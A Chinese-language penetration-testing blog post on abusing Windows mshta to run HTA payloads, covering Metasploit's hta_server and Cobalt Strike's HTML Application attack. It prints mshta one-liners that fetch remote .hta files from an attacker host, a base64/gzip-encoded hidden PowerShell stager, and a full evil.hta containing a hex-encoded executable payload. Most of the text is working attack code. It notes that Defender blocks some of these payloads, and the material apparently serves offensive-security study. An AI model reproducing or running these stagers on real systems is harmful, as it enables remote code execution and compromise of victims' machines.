@Author: Patrilic
@Time: 2019-05-08 11:20:33

0x01 mshta

👉官方文档直通车 –>🚗滴滴滴)

思路:利用Mshta执行JavaScript/VBscript 调用WScript.shell执行命令
结合VBS下载C2 payload,JS下载payload,JSRAT,直接反弹session……
eg:

1
2
3
mshta vbscript:window.execScript("alert('hello world!');","javascript") 

mshta javascript:window.execScript("msgBox('hello world!'):window.close","vbs")

测试:

Attacker : 192.168.199.142 MacOS
Victim : 192.168.121.130 Windows 10 1809

0x02 MetaSploit::hta_server

exploit/windows/misc/hta_server
418b9f4a3fb34ef94542812b0130a9f8

受害机执行

1
mshta http://192.168.199.142:8080/wSbMp9V.hta

会被Defender拦截
样本分析

为Base64加密的ps1代码

1
2
3
4
5
6
7
8
9
10
11
12
if([IntPtr]::Size -eq 4){
$b='powershell.exe'
}else{
$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABhN0FwCA7VW+2/aSBD+OZH6P1gVkm2FYCC0aSJVujVPE5xAHAiEQ6fFXtsLa5vYa169/u83C3abXtO79qSzeOxjZnbmm29m7aahzWkUSr4xlz69OT3p4xgHklJwR1dFqRDdqCcnsFrYs2pd+igpU7RaNaIA03B2fV1P45iE/DgvtQlHSUKCOaMkUVTpT+nRJzE5v5sviM2lT1Lhj1KbRXPMMrFdHds+kc5R6Ii9XmRj4UrJWjHKFfn332V1el6ZlZrPKWaJIlu7hJOg5DAmq9JnVRz4sFsRRTapHUdJ5PLSIw0vqqVhmGCX3IK1NTEJ9yMnkVWIAj4x4WkcSod4hIHjtiLDsB9HNnKcmCSJXJSmwvR0NvtNmWbn3qchpwEpGSEncbSySLymNklKHRw6jNwTdwZaFo9p6M1UFcTW0ZIohTBlrCj9ihnllmxy1H5WSXmpBFJ9HqtFSOMrcZqRkzJy1JRfcVSkXoXnmH7A7fOb0zenbk6U+YX5kigwOpkexgRcU/pRQg9iH6VyUTLhEMyjeAfTwkOcEnX2BVipsF4Wf6xdyUVB0Kt0rS2sTUcRdWagkyWzsAnmYvnHnGwQl4aksQtxQO2cdsprABOXkUOApVzsFpxS5GyDOA3CiIe5gEzk+Tu1ZkD5F109pcwhMbIhSQl4BflTv3XmmAVFNkKTBIDQcQ7EK7hAdpJLZwTf5aeLOQjJdYaTpCj1U6g2uyhZBDPiFCUUJjTbQimPDkP5q7tmyji1ccJzczM1gzE7rh6FCY9TG3IGoT9YK2JTzAQSRalDHaLvLOrlx8qv4lDHjEEJgKU15AFWRPwWF0yIwUPIulqyCDeCFSMBSBxqvsWwBxWe0fxAHOwRR/6bezmLj5QVOOQAvHAOkmuxiBelEY05dA6B6YFB/+XwFy1DuFGPSZYEJS+Mqb7jgs+FjXUlyJghcog/5hB7K44CHSfkfe3YHJS32h2tI3gmRshMW1/SCtrQimHCd0gvjKhx6dx0Fx0tbmx9FxmJYXb6jUGnU1t3rVGNW02D3/QNbjbHi4WFOvfDCX8yUOeBlpeT2n7VpXurh5zJVnu/1/ebsr7dLzzHnTRc17t0rfvKuxbtPdYHermKe41m2nvUN3q5ljTppjOgw8Gy2+LzyYjhoat548oVpttevBhVInNvINT2L+x91x21fdPZTTqULLRyjw7QAKEb+344bHsrr50g7Wr0XA8W6NkkdxgZqDnadd8xfTBs6WjY1Af4LupfnDW0ypPz3Gw9jXE3YE67o1UmY+SgWHvw/MrlnR8KnLCnP+tCBvWedi0NZPo11KlV6f7pedD2UBNkRkGEcIsuh2djsHn7ADqPw4oTIR4aY00beZqHXMufYKSDtP6MWnpU333om31tNKr6lfmy4oPPZLz+YHbRWcvua5p2FszhV0O2udqGY31zud5w3H0E2w/a1fDjW8EQoEhhVa0+vcj9j7q1iePExww4AW04L8FWFLey3tqPqNBQFHEZL0kcEga3Gdx3OZURY5Et+rpownClHBu9uHeGMLyovjpSpS+C6td2ny9dXz+Bj1AaQN9Sj4Qe94vl7UW5DO27vK2VIcSfD6serXaKsFQU3f8AS2aZHSyromAK6fJ/xSqrUR/+nH/B6uvaP+z+FH7l4jHa75a/XfglNH818EdMOQha0GMYOV5vr8af0eLF1Z8uIedu9og3t7uUn9/C+8Cb078ABtGBSyEKAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);

解密后

1
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABhN0FwCA7VW+2/aSBD+OZH6P1gVkm2FYCC0aSJVujVPE5xAHAiEQ6fFXtsLa5vYa169/u83C3abXtO79qSzeOxjZnbmm29m7aahzWkUSr4xlz69OT3p4xgHklJwR1dFqRDdqCcnsFrYs2pd+igpU7RaNaIA03B2fV1P45iE/DgvtQlHSUKCOaMkUVTpT+nRJzE5v5sviM2lT1Lhj1KbRXPMMrFdHds+kc5R6Ii9XmRj4UrJWjHKFfn332V1el6ZlZrPKWaJIlu7hJOg5DAmq9JnVRz4sFsRRTapHUdJ5PLSIw0vqqVhmGCX3IK1NTEJ9yMnkVWIAj4x4WkcSod4hIHjtiLDsB9HNnKcmCSJXJSmwvR0NvtNmWbn3qchpwEpGSEncbSySLymNklKHRw6jNwTdwZaFo9p6M1UFcTW0ZIohTBlrCj9ihnllmxy1H5WSXmpBFJ9HqtFSOMrcZqRkzJy1JRfcVSkXoXnmH7A7fOb0zenbk6U+YX5kigwOpkexgRcU/pRQg9iH6VyUTLhEMyjeAfTwkOcEnX2BVipsF4Wf6xdyUVB0Kt0rS2sTUcRdWagkyWzsAnmYvnHnGwQl4aksQtxQO2cdsprABOXkUOApVzsFpxS5GyDOA3CiIe5gEzk+Tu1ZkD5F109pcwhMbIhSQl4BflTv3XmmAVFNkKTBIDQcQ7EK7hAdpJLZwTf5aeLOQjJdYaTpCj1U6g2uyhZBDPiFCUUJjTbQimPDkP5q7tmyji1ccJzczM1gzE7rh6FCY9TG3IGoT9YK2JTzAQSRalDHaLvLOrlx8qv4lDHjEEJgKU15AFWRPwWF0yIwUPIulqyCDeCFSMBSBxqvsWwBxWe0fxAHOwRR/6bezmLj5QVOOQAvHAOkmuxiBelEY05dA6B6YFB/+XwFy1DuFGPSZYEJS+Mqb7jgs+FjXUlyJghcog/5hB7K44CHSfkfe3YHJS32h2tI3gmRshMW1/SCtrQimHCd0gvjKhx6dx0Fx0tbmx9FxmJYXb6jUGnU1t3rVGNW02D3/QNbjbHi4WFOvfDCX8yUOeBlpeT2n7VpXurh5zJVnu/1/ebsr7dLzzHnTRc17t0rfvKuxbtPdYHermKe41m2nvUN3q5ljTppjOgw8Gy2+LzyYjhoat548oVpttevBhVInNvINT2L+x91x21fdPZTTqULLRyjw7QAKEb+344bHsrr50g7Wr0XA8W6NkkdxgZqDnadd8xfTBs6WjY1Af4LupfnDW0ypPz3Gw9jXE3YE67o1UmY+SgWHvw/MrlnR8KnLCnP+tCBvWedi0NZPo11KlV6f7pedD2UBNkRkGEcIsuh2djsHn7ADqPw4oTIR4aY00beZqHXMufYKSDtP6MWnpU333om31tNKr6lfmy4oPPZLz+YHbRWcvua5p2FszhV0O2udqGY31zud5w3H0E2w/a1fDjW8EQoEhhVa0+vcj9j7q1iePExww4AW04L8FWFLey3tqPqNBQFHEZL0kcEga3Gdx3OZURY5Et+rpownClHBu9uHeGMLyovjpSpS+C6td2ny9dXz+Bj1AaQN9Sj4Qe94vl7UW5DO27vK2VIcSfD6serXaKsFQU3f8AS2aZHSyromAK6fJ/xSqrUR/+nH/B6uvaP+z+FH7l4jHa75a/XfglNH818EdMOQha0GMYOV5vr8af0eLF1Z8uIedu9og3t7uUn9/C+8Cb078ABtGBSyEKAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Gzip文件流Base64加密

Defender拦截

0x03 Cobalt Strike

Attacks –> Packages –> HTML Application

b38801405640b4a557ac53ba451a66db

生成的.HTA文件存在本地,可以通过多种方式传入受害机
受害机上执行命令

1
mshta http://192.168.199.142:8080/evil.hta

evil.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<script language="VBScript">
Function var_func()
var_shellcode = "04d5a9000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010700e26f3a570000000000000000e0000f030b010216001c00000034000000060000b0140000001000000030000000004000001000000002000004000000010000000400000000000000009000000004000024dc0000020000000000200000100000000010000010000000000000100000000000000000000000006000003006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000018000000000000000000000000000000000000001c610000e00000000000000000000000000000000000000000000000000000002e74657874000000c41a000000100000001c000000040000000000000000000000000000600050602e6461746100000024060000003000000008000000200000000000000000000000000000400060c02e72646174610000d0020000004000000004000000280000000000000000000000000000400030402e627373000000001c040000005000000000000000000000000000000000000000000000800060c02e69646174610000300600000060000000080000002c0000000000000000000000000000400030c02e4352540000000034000000007000000002000000340000000000000000000000000000400030c02e746c730000000020000000008000000002000000360000000000000000000000000000400030c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f3c38db426000000008dbc270000000083ec2ca120504000c744241018504000c74424080c504000c744240408504000a318504000a124504000c70424045040008944240ce896190000a31c50400083c42cc38db6000000008dbc270000000083ec1c31c066813d000040004d5ac7053050400001000000c7052c50400001000000c7052850400001000000c7053c504000010000007468a314504000a14050400085c0744ac7042402000000e836190000c70424ffffffffe8020800008b1544504000a3fc534000a300544000a1ac6140008910e8260b0000833d1436400001746d31c083c41cc38db42600000000c7042401000000e8ec180000ebb466908b153c00400081ba00004000504500008d8a0000400075800fb751186681fa0b01743f6681fa0b020f856affffff83b9840000000e0f865dffffff8b91f800000031c085d20f95c0e94bffffff8d7600c70424a01b4000e8340a000031c083c41cc38379740e0f862cffffff8b89e800000031c085c90f95c0e91affffff66905531c089e5b91100000057568d55a45389d783ec7cf3abb030e8d217000029c48d44241b83e0f0c700ccccccccc74004ccccccccc74008ccccccccc7400cccccccccc74010ccccccccc74014ccccccccc74018ccccccccc7401ccccccccc83e4f0a14050400085c00f858502000064a1180000008b35686140008b5804eb159039d80f8418020000c70424e8030000ffd683ec04c744240800000000895c2404c7042404544000e89417000083ec0c85c075cda10854400031db83f8010f84f0010000a10854400085c00f8434020000c7050050400001000000a10854400083f8010f84e801000085db7507f0871d04544000a18040400085c0741cc744240800000000c744240402000000c7042400000000ffd083ec0ce8130c0000c70424b0194000ff156461400083ec04a348504000e8a9110000c744240400404000890424ff154061400083ec0885c07409c7042400104000ffd0e843120000a14050400085c0745ea1a061400031c98b00eb0b84d2742b84c9741c83c0010fb61080fa207eed89cb83f30180fa220f44cbebe884d2740b83c0010fb61080fa207ef10fb755d4f645d001a3e4534000b80a000000c705ec534000000040000f45c2a3e85340008b150450400031db8d049504000000895594890424e89a1600008b3d085040008945908b459485c07e3c66908b049f890424e8851600008d7001893424e8721600008b559089049a8b149f83c3018974240889042489542404e84e1600003b5d9475c9c1e3028b4590c7041800000000a308504000e8f2110000a1906140008b150c5040008910a10c50400089442408a10850400089442404a104504000890424e89a0200008b351450400085f6a3105040000f84aa0000008b1d0050400085db750ae8fc150000a1105040008d65f45b5e5f5dc38db42600000000a108544000bb0100000083f8010f8510feffffc704241f000000e8d1150000a10854400083f8010f851bfeffff8d7600c744240408704000c7042400704000e8b4150000c7050854400002000000e9f5fdffff891424ff154461400083ec04e96afdffffc7050854400001000000c744240418704000c704240c704000e876150000e9b3fdffff890424e8711500009083ec0cc7054050400001000000e80e11000083c40ce9b6fcffff8db60000000083ec0cc7054050400000000000e8ee10000083c40ce996fcffff9090909090905589e583ec18a12036400085c0743cc7042420404000ff153c614000ba0000000083ec0485c07416c74424042e404000890424ff154061400083ec0889c285d27409c7042420364000ffd2c9c38d76005589e55dc390909090909090909090905589e55383ec348b450cc744240c40000000c74424080010000089442404c7042400000000a178614000ffd083ec108945f0c745f400000000eb448b45f489c1034d088b45f40345080fb6188b45f489c2c1fa1fc1ea1e01d083e00329d00345100fb60031d888018b45f489c20355088b45f40345f00fb61288108345f4018b45f43b450c7cb48b45f0c744241400000000c744241000000000c744240c0000000089442408c744240400000000c7042400000000a11c614000ffd083ec188b5dfcc9c35589e583ec28c745f4003040008b45f48b4004890424e8c91300008945f08b45f48b400489c18b45f483c01089c28b45f0894c240889542404890424e89b1300008b45f48d50088b45f48b400489542408894424048b45f0890424e8dcfeffff8b45f0890424e8a9130000c9c39090908d4c240483e4f0ff71fc5589e55183ec14e8160f0000c7042400000000e86effffffc7042410270000a168614000ffd083ec04ebed9090900000000083ec1c8b44242485c0741583f8037410b80100000083c41cc20c00908d7426008b542428894424048b44242089542408890424e8d8110000b80100000083c41cc20c008db6000000008dbc27000000005383ec188b15c46140008b442424833a037631833d1036400002740ac705103640000200000083f8020f840401000083f8010f849a00000083c418b8010000005bc20c00c705f853400001000000c7042444404000ff155861400083ec0485c0a3385040000f84f80000008b1d40614000c744240451404000890424ffd3a3f4534000a13850400083ec08c74424046c404000890424ffd38b153850400083ec0885d2a3f05340000f84b50000008b0df453400085c9743b85c07437c705103640000100000083c418b8010000005bc20c008b442428c744240401000000894424088b442420890424e8d2100000e945ffffffc705f053400000000000c705f453400000000000891424ff152861400083ec04c7053850400000000000b801000000c705103640000000000083c4185bc20c00bb3070400081fb307040000f84f4feffff8b0385c07402ffd083c30481fb3070400075ed83c418b8010000005bc20c00c705f053400000000000c705f453400000000000eb9a8db4260000000031c0c390909090909090909090909090a194614000ffe09090909090909090908b442404c38d7426008dbc27000000008b442404c390909090909090909090905383ec28a1005440008b5c2430890424e8cbffffff83f8ff894424180f847e000000c7042408000000e832110000a100544000890424e8a5ffffff89442418a1fc534000890424e894ffffff891c248944241c8d44241c894424088d44241889442404e80011000089c38b442418890424e87affffffa3005440008b44241c890424e869ffffffc7042408000000a3fc534000e8d810000083c42889d85bc390891c24ff15bc61400083c42889c389d85bc38db426000000008dbc270000000083ec1c8b442420890424e831ffffff83f80119c083c41cc39090909090909090565383ec248b5c24308b038b003d910000c077433d8d0000c07269be01000000c744240400000000c7042408000000e86410000083f8010f841301000085c0742bc7042408000000ffd0b8ffffffff83c4245b5ec204003d940000c074673d960000c0742d3d930000c074afa14850400085c00f84ca000000895c243083c4245b5effe03d050000c074453d1d0000c075dac744240400000000c7042404000000e8f20f000083f801745c85c074bdc7042404000000ffd083c424b8ffffffff5b5ec2040031f6e954ffffff8d742600c744240400000000c704240b000000e8b40f000083f801743c85c00f847bffffffc704240b000000ffd083c424b8ffffffff5b5ec20400c744240401000000c7042404000000e87d0f0000b8ffffffffe92affffffc744240401000000c704240b000000e85f0f0000b8ffffffffe90cffffff31c0e905ffffff8db600000000c744240401000000c7042408000000e8340f000085f6b8ffffffff0f84defeffff8944241ce8f60900008b44241ce9ccfeffff9090909090909090909090909083ec3ca14c504000dd442448dd442450dd44245885c07429d9ca8b542440dd5c2418dd5c2420dd5c2428895424108b542444895424148d542410891424ffd0eb06ddd8ddd8ddd883c43cc3908d7426008b442404a34c504000e9b20e0000669083ec3cba844040008b4424408b0883e90183f90577078b148da0414000dd4018dd5c2420dd4010dd5c2418dd4008dd5c24108b400489542408c7442404944040008944240ca1b461400083c040890424e8630e000031c083c43cc3909090909031c0c3909090909090909090909090905383ec18a1b4614000c74424081b0000008d5c2424c744240401000000c70424b841400083c0408944240ce8200e00008b442420895c240889442404a1b461400083c040890424e80c0e0000e80f0e0000eb0d909090909090909090909090905589cd57565389c383ec6c8b0d585040008954241c85c90f8ec5010000a15450400031f68b500439d3720e8b780803570839d30f82d700000083c60183c00c39ce75e1891c24e8b505000085c089c70f84b40100008d14768b3554504000c1e20201d6894608c7060000000089542418e86b0600008b54241803470c8946048d4424408b358061400089442404a154504000c74424081c0000008b441004890424ffd683ec0c85c08b5424180f84370100008b44245483f8040f85d2000000830558504000018d442424c74424081c00000089442404891c24ffd683ec0c85c00f84330100008b44243883f80475298b44241c896c2408891c2489442404e87d0c000083c46c5b5e5f5dc3908d7426008b3580614000ebae83f84074d28b4424308d7c245c8b357c614000897c240cc744240840000000894424048b442424890424ffd683ec108b44241c896c2408891c2489442404e8250c00008b44243883f840749f83f804749a8b44245c897c240c894424088b442430894424048b442424890424ffd683ec1083c46c5b5e5f5dc383f8400f8425ffffff8b44244c031554504000c744240840000000894424048b4424408954240c890424ff157c61400083ec1085c00f85f3feffffff1538614000c704242842400089442404e8befdffff31f6e95afeffffa1545040008b441004894424088b4708c70424f441400089442404e897fdffff895c2404c70424d4414000e887fdffff895c2408c74424041c000000c70424f4414000e86ffdffffeb0d909090909090909090909090905589e557565383ec4ca15050400085c0740e8d65f45b5e5f5dc38db600000000c7055050400001000000e8d10300008d04408d04851e00000083e0f0e87f0a0000c705585040000000000029c48d44241f83e0f0a354504000b8d04240002dd042400083f8077eaa83f80bbbd04240000f8eea000000a1d042400085c07511a1d442400085c00f84c00000008d74260081fbd04240000f8376ffffffbe000040008b4304b90400000001f08b10031383c3088955e48d55e4e803fdffff81fbd042400072dc8b0d5850400085c90f8e3fffffff31db31f68b3d80614000eb139083c60183c30c3b35585040000f8d20ffffffa15450400001d88b1085d274e18d55c4c74424081c000000895424048b4004890424ffd783ec0c85c00f84510100008d45e48944240ca1545040008b0418894424088b45d0894424048b45c4890424ff157c61400083ec10eb94a1d842400085c07520bbdc4240008db6000000008b3b85ff0f8526ffffff8b730485f60f851bffffff8b430883f8010f851401000083c30c81fbd04240000f8382feffff0fb65308b8000040008b0b03430483fa108bb100004000744183fa20747283fa08741789542404c7042484424000c745e000000000e896fbffff0fb638f7c780000000742081cf00ffffff29cf81ef0000400001fe8975e0eb270fb738f7c700800000755b29cf81ef0000400001fe83fa108975e0745c83fa20742383fa08752bb9010000008d55e0e8a2fbffffeb1c8b1029ca81ea0000400001f28955e0b9040000008d55e0e884fbffff83c30c81fbd04240000f8245ffffffe975feffff81cf0000ffff29cf81ef0000400001fe8975e0b9020000008d55e0e850fbffffebca031d545040008b4304894424088b43088b4008c70424f441400089442404e8cbfaffff89442404c7042450424000e8bbfaffff90909090909090909090908b54240431c066813a4d5a7403f3c39003523c813a5045000075f231c066817a180b010f94c0c389f68dbc27000000005631c0538b54240c8b5c241003523c0fb772060fb74a1485f674230fb7c98d440a1831d28b480c39d9770703480839cb720c83c20183c02839f272e831c05b5ec3eb0d909090909090909090909090905557565331db83ec1c8b7c2430893c24e80b08000083f8087759c7042400004000e85affffff85c07449a13c0040000fb7a8060040000fb79014004000050000400085ed742d0fb7d231f68d5c1018eb0a83c60183c32839ee7325c744240808000000897c2404891c24e82908000085c075de83c41c89d85b5e5f5dc38d760083c41c31db89d85b5e5f5dc38d74260083ec08c7042400004000e8e1feffff89c231c085d274198b44240cc70424000040002d0000400089442404e8f0feffff83c408c38db6000000008dbf0000000083ec04c7042400004000e8a1feffff31d285c0740ca13c0040000fb7900600400089d083c404c389f68dbc2700000000565383ec04c70424000040008b5c2410e86bfeffff31d285c0743ea13c0040000fb788060040000fb7b014004000050000400085c974220fb7f68d54301831c0f6422720740785db740f83eb0183c00183c22839c872e931d283c40489d05b5ec3eb0d9090909090909090909090909083ec04c7042400004000e801feffff31d285c0b8000040000f45d083c40489d0c3eb0d909090909090909090909090905331db83ec08c7042400004000e8cefdffff85c0750a83c40889d85bc38d76008b442410c70424000040002d0000400089442404e8d7fdffff85c074d98b582483c408f7d3c1eb1f89d85bc38d7426005731ff565383ec08c70424000040008b5c2418e878fdffff85c07455a13c0040008bb08000400085f6744689742404c7042400004000e885fdffff85c0743281c600004000750feb288db4260000000083eb0183c6148b560485d275078b460c85c0741c85db7fe88b7e0c81c70000400083c40889f85b5e5fc38db60000000083c40831ff89f85b5e5fc3908d7426005383ec18a15c50400085c0740583c4185bc331c08904248d5801e851ffffff85c0747d0fb61080fa4d740580fa6d75500fb6500180fa53740580fa7375420fb6500280fa56740580fa7675340fb6500380fa43740580fa6375260fb6500480fa52740580fa7275180fb6500580fa54741380fa74740e83ea3080fa097606669089d8eb90890424ff153c61400083ec0485c0a35c5040000f8570ffffff8d7600c70424b0424000ff155c61400083ec04a35c504000e953ffffff909090909090dbe3c39090909090909090909090909083ec0ca10c3640008b0085c074196690ffd0a10c3640008d50048b400489150c36400085c075e983c40cc3908d7426005383ec188b1db02a400083fbff742485db740fff149db02a400083eb018d760075f1c7042430254000e802f4ffff83c4185bc331dbeb0289c38d43018b1485b02a400085d275f0ebc68db426000000008b0d6050400085c97406f3c38d742600c7056050400001000000eb949090909083ec4ca118364000895c243c89742440897c24443d4ee640bb896c2448c744242000000000c7442424000000007421f7d0a31c3640008b5c243c8b7424408b7c24448b6c244883c44cc38db6000000008d442420890424ff154861400083ec048b4424248b6c24208944241cff153061400089c7ff153461400089c6ff154c61400089c38d442428890424ff156061400083ec04336c241c336c2428336c242c31fd31f531dd89e881fd4ee640bbf7d07410892d18364000a31c364000e974ffffffb8b019bf44bd4fe640bbebe466905589e583ec288b45048d5504891544514000c70560534000090400c0c7056453400001000000a338514000a36c5340008b4508c7042400000000a32c514000a1183640008945f0a11c3640008945f4ff156461400083ec04c70424c8424000ff157461400083ec04ff152c614000c7442404090400c0890424ff156c61400083ec08e8490300009090909090909090905557565383ec1cc70424c4534000ff15246140008b1ddc53400083ec0485db74348b2d706140008b3d386140008d76008b03890424ffd583ec0489c6ffd785c0750c85f674088b4304893424ffd08b5b0885db75dbc70424c4534000ff155461400083ec0483c41c5b5e5f5dc38d760083ec1ca1c0534000895c241431db8974241885c0750e89d88b7424188b5c241483c41cc3c74424040c000000c7042401000000e8a802000085c089c674498b442420c70424c453400089068b442424894604ff1524614000a1dc5340008935dc53400089460883ec04c70424c4534000ff155461400089d883ec048b5c24148b74241883c41cc3bbffffffffeb8866905383ec18a1c05340008b5c242085c0750783c41831c05bc3c70424c4534000ff15246140008b15dc53400083ec0485d2741d8b0239d87510eb4c8db6000000008b0839d9742089c28b420885c075f1c70424c4534000ff155461400083ec0483c41831c05bc38b4808894a08890424e884010000c70424c4534000ff155461400083ec04ebd98b4208a3dc53400089d0ebda8db426000000008dbc270000000083ec1c8b44242483f8017444721283f803745db80100000083c41cc38d742600a1c053400085c07569a1c053400083f80175e0c705c053400000000000c70424c4534000ff152061400083ec04ebc490a1c053400085c07427c705c053400001000000b80100000083c41cc38d742600a1c053400085c0749ae8e2fdffffeb93c70424c4534000ff155061400083ec04ebc7e8c9fdffffeb909090909090909051503d001000008d4c240c721581e9001000008309002d001000003d0010000077eb29c18309005859c39090000000008b44240c8b5424088b4c2404f00fb111c3eb0d909090909090909090909090908b44240c8b5424088b4c2404f00fb111c20c0090909090909090909090909090ff258c6140009090ff25986140009090ff25e46140009090ff25e06140009090ff25ec6140009090ff25a86140009090ff25a46140009090ff25b06140009090ff25d06140009090ff25d86140009090ff25b86140009090ff25886140009090ff25c06140009090ff25e86140009090ff259c6140009090ff25d46140009090ff25dc6140009090ff25f46140009090ff25c86140009090ff25f06140009090ff25cc614000909000000000000000005589e583ec18e855eaffffc7042440154000e8e9eeffffc9c390909090909090ffffffff902a400000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010200000110200005694e0fa61616161aa7c69fa56948073b3a5329eddc6d07104986ba8421f92d25923aadc676bd13afaa8818654b8c03b9999e13db464b2adddc6f07114a8e12addd4987f96e0aafb86c46bb24e1fb8da574703c61f1fd4715742d10567544c3b9999e13d6e74950e55e918c12bb095180e1fb8de574786715adf6ba24a953371521fe12adfd0c4de0dcf81a30cc51f1a0ecbba71447f66a73efa858e56fc979338fdb4921ae3c6fda941087a5694e0b739ee89963af5cfcf78a4c0d235fb8d8a37e089983af1dbda1bc7a9bf76adceca6db4b79338f08f8d25b4aeae76a2cecb6db4b79338a2d4c176ecd6ce6db4b4883ff0859422bbd5d466afc0b819dda5c36dd1aeaf05bde0a20eccb8a20eccb8a20eccb8a20eccb8a20eccb8a20eccb8a20eccb8a20eccb8a20eccb8a20ecce0a3676bb7ad01c3b1926cc2995da9410b830da529ab07fee3ab07fcb0fa5694b3aa3ec36965906b351134cdd12804fce0f83610b2a804c5b2aa3e7fb5d46d6b357390a51fad01c3b7ac3eb9e6e22d6b357f96e0a4cba911168e521d19115ffc4a3fb4c91f2fdf5588bf77cad10583a51fad3c93b1ac06fc57adb69f1f2fe994cffa56ad278eeaa51f11437fa912cf6b1f0579f8b6b71b94e092a62142aca9418aba3e94f0fa56fce0fa1694b7920e30b31fa94173a9051d07ad3e94c0fa56c7b69244026918a941653a22596bfd5757653a2371b839bea31f05a9a5d9c878a5d6c278a5d9c378a5d4c85658354f2150254041505b345c505a58353428505e2937434329377d2445494341522d5354414e444152442d414e544956495255532d544553542d46494c452124482b482a4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff000000ffffffffffffffffc02a400002000000ffffffff4ee640bbb119bf440000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005f7365745f696e76616c69645f706172616d657465725f68616e646c657200006c696267636a2d31322e646c6c005f4a765f5265676973746572436c61737365730000006d696e67776d31302e646c6c005f5f6d696e67777468725f72656d6f76655f6b65795f64746f72005f5f6d696e67777468725f6b65795f64746f720010174000556e6b6e6f776e206572726f720000005f6d61746865727228293a20257320696e2025732825672c2025672920202872657476616c3d2567290a0000417267756d656e7420646f6d61696e206572726f722028444f4d41494e2900417267756d656e742073696e67756c617269747920285349474e2900004f766572666c6f772072616e6765206572726f7220284f564552464c4f57290054686520726573756c7420697320746f6f20736d616c6c20746f20626520726570726573656e7465642028554e444552464c4f5729000000546f74616c206c6f7373206f66207369676e69666963616e63652028544c4f53532900005061727469616c206c6f7373206f66207369676e69666963616e63652028504c4f53532900000000c0404000df404000fc4040001c41400054414000784140004d696e67772d7736342072756e74696d65206661696c7572653a0a004164647265737320257020686173206e6f20696d6167652d73656374696f6e0020205669727475616c5175657279206661696c656420666f7220256420627974657320617420616464726573732025700000000020205669727475616c50726f74656374206661696c6564207769746820636f6465203078257800002020556e6b6e6f776e2070736575646f2072656c6f636174696f6e2070726f746f636f6c2076657273696f6e2025642e0a0000002020556e6b6e6f776e2070736575646f2072656c6f636174696f6e206269742073697a652025642e0a0000006d00730076006300720074002e0064006c006c000000000060534000805040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000